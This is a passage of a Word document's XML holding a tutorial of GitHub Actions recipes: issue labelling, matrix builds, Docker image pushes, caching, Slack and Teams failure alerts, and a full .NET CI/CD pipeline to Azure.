        <w:t xml:space="preserve">Every team has at least one of these — old preview envs, orphaned test databases, expired tokens.</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Nightly Cleanup</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schedule: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cron: '0 3 * *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workflow_dispatch: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cleanup:</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./scripts/cleanup.sh</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Recipe 4 — Label new issues automatically</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">actions/github-script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a handy way to call the GitHub API from a workflow without writing a whole action.</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Label Issues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issues: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types: [opened]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label:</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permissions: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issues: write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actions/github-script@v7</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script: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github.rest.issues.addLabels({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owner: context.repo.owner,</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repo: context.repo.repo,</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issue_number: context.issue.number,</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labels: ['needs-triage']</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Recipe 5 — Test across multiple OS and versions (matrix)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">When your code has to work on more than one thing, a matrix runs all combinations in parallel:</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 matrix.os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strategy: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matrix:</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os: [ubuntu-latest, macos-latest, windows-latest]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 [18, 20, 22]</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actions/setup-node@v4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 ${{ matrix.node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test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This fires nine jobs — three OSes times three Node versions — all at once.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">"What if I have three *different* tasks, each needing its own OS?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> That's a common follow-up. Matrix is for running the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">same steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> with different parameters. If your three tasks are genuinely different — say, "build the Linux binary," "build the Mac DMG," and "build the Windows installer" — don't force them into a matrix. Just declare three jobs, each with its own </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">runs-on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preser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build-linux:</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./scripts/build-linux.sh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actions/upload-artifact@v4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linux-binary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 dist/myapp-linux</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build-mac:</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macos-latest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./scripts/build-mac.sh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actions/upload-artifact@v4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mac-dmg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 dist/myapp.dmg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build-windows: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windows-latest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.\scripts\build-windows.ps1</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actions/upload-artifact@v4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windows-installer</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 dist/myapp-setup.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">All three run in parallel (no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">needs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">), each on the OS it needs, each producing its own artifact. The rule of thumb: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">matrix for "same work, different inputs"; separate jobs for "different work."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recipe 6 — Build and push a Docker image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Pushes to GitHub's own container registry (GHCR). The built-in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is enough — no Docker Hub account required.</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Build and Push Image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permissions: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contents: read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packages: write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Log in to GHCR</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docker/login-action@v3</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registry: ghcr.io</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username: ${{ github.actor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password: ${{ secrets.GITHUB_TOKEN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Build and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docker/build-push-action@v5</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context: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tags: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ghcr.io/${{ github.repository }}:latest</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ghcr.io/${{ github.repository }}:${{ github.sha }}</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Recipe 7 — Cache dependencies for speed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the biggest bang-for-buck changes you can make. The cache key only changes when your lockfile changes, so unchanged dependencies come straight out of cache. Typical 5–10× speedup.</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Restore npm cache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actions/cache@v4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 ~/.npm</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key: ${{ runner.os }}-npm-${{ hashFiles('**/package-lock.json')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restore-keys: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runner.os }}-npm-</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actions/setup-node@v4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 '20'</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ci</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test</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Recipe 8 — Notify Slack when the deploy breaks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to know when main is broken before your users do.</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./deploy.sh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Notify Slack on failure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failure()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slackapi/slack-github-action@v1</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payload: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"text": ":x: Deploy failed on ${{ github.ref_name }} by ${{ github.actor }}\n&lt;${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}|View run&gt;"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SLACK_WEBHOOK_URL: ${{ secrets.SLACK_WEBHOOK_URL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SLACK_WEBHOOK_TYPE: INCOMING_WEBHOOK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">if: failure()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the important bit — it makes the step run only when an earlier step in the same job has failed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recipe 9 — Notify Microsoft Teams instead of Slack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Same idea as Recipe 8, different chat tool. Teams accepts incoming webhooks and renders Adaptive Cards. The only real difference is the JSON shape.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up the webhook in Teams</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (one-time):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the channel where alerts should land.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Click the three-dot menu next to the channel name → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Workflows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Post to a channel when a webhook request is received</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Walk through the dialog (it'll auto-pick the channel) and copy the webhook URL it gives you.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">In your repo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Settings → Secrets and variables → Actions → New repository secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, name it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">TEAMS_WEBHOOK_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, paste the URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The workflow step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preser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Notify Teams on failure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failure()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curl -H 'Content-Type: application/json'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"type": "message",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"attachments":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"contentType": "application/vnd.microsoft.card.adaptive",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"content":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"type": "AdaptiveCard",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"version": "1.4",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"body":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"type": "TextBlock",</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"text": "❌ Deploy failed on ${{ github.ref_name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"weight": "Bolder",</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"size": "Medium",</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"color": "Attention"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"type": "TextBlock",</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"text": "Author: ${{ github.actor }} • Run #${{ github.run_id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"isSubtle":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"wrap":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"type": "TextBlock",</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"text": "[View run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id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"wrap":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secrets.TEAMS_WEBHOOK_URL }}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A few quick gotchas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Adaptive Cards vs plain text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — you </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> send </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">{"text": "deploy failed"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Teams will accept it, but the card format gives you bold, color, and clickable links. Worth the extra ten lines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Webhook URL is a secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — anyone with the URL can post to your channel. Treat it like a credential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Per-channel webhooks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — each channel needs its own webhook. If you alert different channels for prod vs staging, store two secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recipe 10 — A complete .NET pipeline (worked example)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A real-world CI/CD workflow for a typical .NET 8 web app, from PR to production. It pulls in matrix testing, dependency caching, OIDC to Azure, ACR push, and Azure App Service deploy — all the pieces from earlier sections, composed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The end-to-end .NET workflow</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.NET CI/CD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pull_request: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DOTNET_VERSION: '8.0.x'</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CONFIGURATION: Release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ACR_NAME: mycompanyregistry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IMAGE_NAME: myapp</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APP_SERVICE_NAME: my-dotnet-app</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 CI: lint, build, test on every push and PR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build-and-test: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Set up .NET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actions/setup-dotnet@v4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dotnet-version: ${{ env.DOTNET_VERSION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Cache NuGet packages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actions/cache@v4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 ~/.nuget/packages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key:  ${{ runner.os }}-nuget-${{ hashFiles('**/*.csproj')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restore-keys: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runner.os }}-nuget-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Restore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dotnet restore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Format check (lint)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dotnet format --verify-no-changes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dotnet build --configuration ${{ env.CONFIGURATION }} --no-restore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Test with coverage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dotnet test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--configuration ${{ env.CONFIGURATION }}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--no-build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--logger "trx"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--collect:"XPlat Code Coverage"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Upload test results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always()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actions/upload-artifact@v4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test-results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 '**/TestResults/**/*.trx'</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Publish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dotnet publish ./src/MyApp/MyApp.csproj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 ${{ env.CONFIGURATION }}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-o ./publish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Upload publish output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actions/upload-artifact@v4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app-publish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 ./publish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 CD: build image, push to ACR, deploy to App Service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build-and-test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github.ref == 'refs/heads/main' &amp;&amp; github.event_name ==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permissions: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id-token: write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contents: read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environment: production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actions/download-artifact@v4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app-publish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 ./publish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azure/login@v2</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client-id:       ${{ secrets.AZURE_CLIENT_ID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tenant-id:       ${{ secrets.AZURE_TENANT_ID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subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID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Log in to Azure Container Registry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az acr login --name ${{ env.ACR_NAME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Build and push image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docker build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 ${{ env.ACR_NAME }}.azurecr.io/${{ env.IMAGE_NAME }}:${{ github.sha }}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 ${{ env.ACR_NAME }}.azurecr.io/${{ env.IMAGE_NAME }}:latest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-f Dockerfile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docker push ${{ env.ACR_NAME }}.azurecr.io/${{ env.IMAGE_NAME }}:${{ github.sha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docker push ${{ env.ACR_NAME }}.azurecr.io/${{ env.IMAGE_NAME }}:latest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Deploy to Azure App Service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azure/webapps-deploy@v3</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app-name: ${{ env.APP_SERVICE_NAME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images:   ${{ env.ACR_NAME }}.azurecr.io/${{ env.IMAGE_NAME }}:${{ github.sha }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps,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What it does</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Why it's there</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checkout</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Clones the repo onto the runner.</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Every job that touches code needs this first.</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setup-dotnet</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Installs the .NET 8 SDK.</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The runner doesn't have your specific SDK pinned.</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actions/cache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Caches </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">~/.nuget/packages</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> keyed by csproj hashes.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Saves 30–90 seconds per build for unchanged deps.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dotnet restore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Pulls down all NuGet packages.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Needed before </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">build</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">.</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dotnet format --verify-no-changes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Static formatting check; fails if code isn't formatted.</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This is the "lint" step for .NET.</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dotnet build --no-restore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Compiles in Release configuration.</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--no-restore</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> skips a redundant restore.</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dotnet test</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Runs the unit tests with code coverage.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The whole point of CI.</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upload-artifact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (test results)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Saves the .trx test results.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Lets reviewers download them, attaches to the run summary.</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dotnet publish</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Packages the app for deployment.</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Produces the binaries the deploy job will ship.</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upload-artifact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
